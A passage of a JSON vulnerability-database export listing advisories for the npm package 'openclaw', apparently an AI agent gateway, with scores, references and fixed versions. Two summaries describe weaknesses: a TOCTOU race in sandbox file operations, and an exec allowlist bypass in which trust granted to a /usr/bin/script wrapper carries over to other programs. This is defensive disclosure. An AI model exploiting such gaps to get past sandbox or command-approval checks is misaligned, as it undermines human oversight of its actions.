                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"
                }
            ],
            "aliases": [
                "CVE-2026-43574",
                "GHSA-49cg-279w-m73x"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2mxq-krq5-bycx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89509?format=api",
            "vulnerability_id": "VCID-2uqu-k42d-1baq",
            "summary": "OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n## Summary\nSandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `32a4a47d602e0618f87b3e59f94d8c142767f860` — 2026-03-30T16:49:49+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/32a4a47d602e0618f87b3e59f94d8c142767f860"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rm5c-4rmf-vvhw"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rm5c-4rmf-vvhw",
                    "reference_id": "GHSA-rm5c-4rmf-vvhw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rm5c-4rmf-vvhw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "GHSA-rm5c-4rmf-vvhw"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2uqu-k42d-1baq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91485?format=api",
            "vulnerability_id": "VCID-2v8n-mnws-jfc9",
            "summary": "OpenClaw has a gateway exec allowlist allow-always bypass via unregistered /usr/bin/script wrapper\n## Summary\n\nAllow-always persistence did not unwrap `/usr/bin/script` and similar wrappers to the actual executed target before storing trust decisions.\n\n## Impact\n\nA user approval for one wrapped command could persist trust for a wrapper binary that later executed a different underlying program.\n\n## Affected Component\n\n`src/infra/dispatch-wrapper-resolution.ts, src/infra/exec-wrapper-resolution.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `83da3cfe31` (`infra: unwrap script wrapper approval targets`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41390",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07933",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07919",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07946",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41390"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/83da3cfe31f016841e1deedda1a604696f4c488d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6pfc-6m7w-m8fx"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41390",
                    "reference_id": "CVE-2026-41390",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41390"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6pfc-6m7w-m8fx",
                    "reference_id": "GHSA-6pfc-6m7w-m8fx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6pfc-6m7w-m8fx"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper",
                    "reference_id": "openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T19:25:11Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-unregistered-usr-bin-script-wrapper"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41390",
                "GHSA-6pfc-6m7w-m8fx"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
